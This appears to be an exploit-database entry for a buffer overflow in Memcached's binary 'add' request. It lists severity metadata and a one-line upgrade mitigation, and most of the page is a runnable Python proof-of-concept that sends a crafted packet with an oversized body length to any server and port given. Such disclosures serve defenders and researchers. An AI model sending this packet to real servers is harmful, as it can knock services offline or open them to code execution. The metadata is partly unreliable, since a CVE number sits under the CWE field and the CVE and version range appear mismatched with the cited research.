Memcached Add Request Buffer Overflow

vendor:

Memcached

by:

Seebug

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Memcached

Affected Version From: 1.5.6

Affected Version To: 1.5.9

Patch Exists: YES

Related CWE: CVE-2018-1000115

CPE: 2.3:a:memcached:memcached

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Mac, Windows

2018

Memcached Add Request Buffer Overflow

This exploit is a buffer overflow vulnerability in the Memcached add request. It allows an attacker to send a maliciously crafted add request to the server, which can cause a denial of service or potentially allow arbitrary code execution.

Mitigation:

Upgrade to the latest version of Memcached

Source

Exploit-DB raw data:

# Source: http://paper.seebug.org/95/

import struct  
import socket  
import sys

MEMCACHED_REQUEST_MAGIC = "\x80"  
OPCODE_ADD = "\x02"  
key_len = struct.pack("!H",0xfa)  
extra_len = "\x08"  
data_type = "\x00"  
vbucket = "\x00\x00"  
body_len = struct.pack("!I",0xffffffd0)  
opaque = struct.pack("!I",0)  
CAS = struct.pack("!Q",0)  
extras_flags = 0xdeadbeef  
extras_expiry = struct.pack("!I",0xe10)  
body = "A"*1024

packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len  
packet += data_type + vbucket + body_len + opaque + CAS  
packet += body  
if len(sys.argv) != 3:  
        print "./poc_add.py <server> <port>"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((sys.argv[1],int(sys.argv[2])))  
s.sendall(packet)  
print s.recv(1024)  
s.close()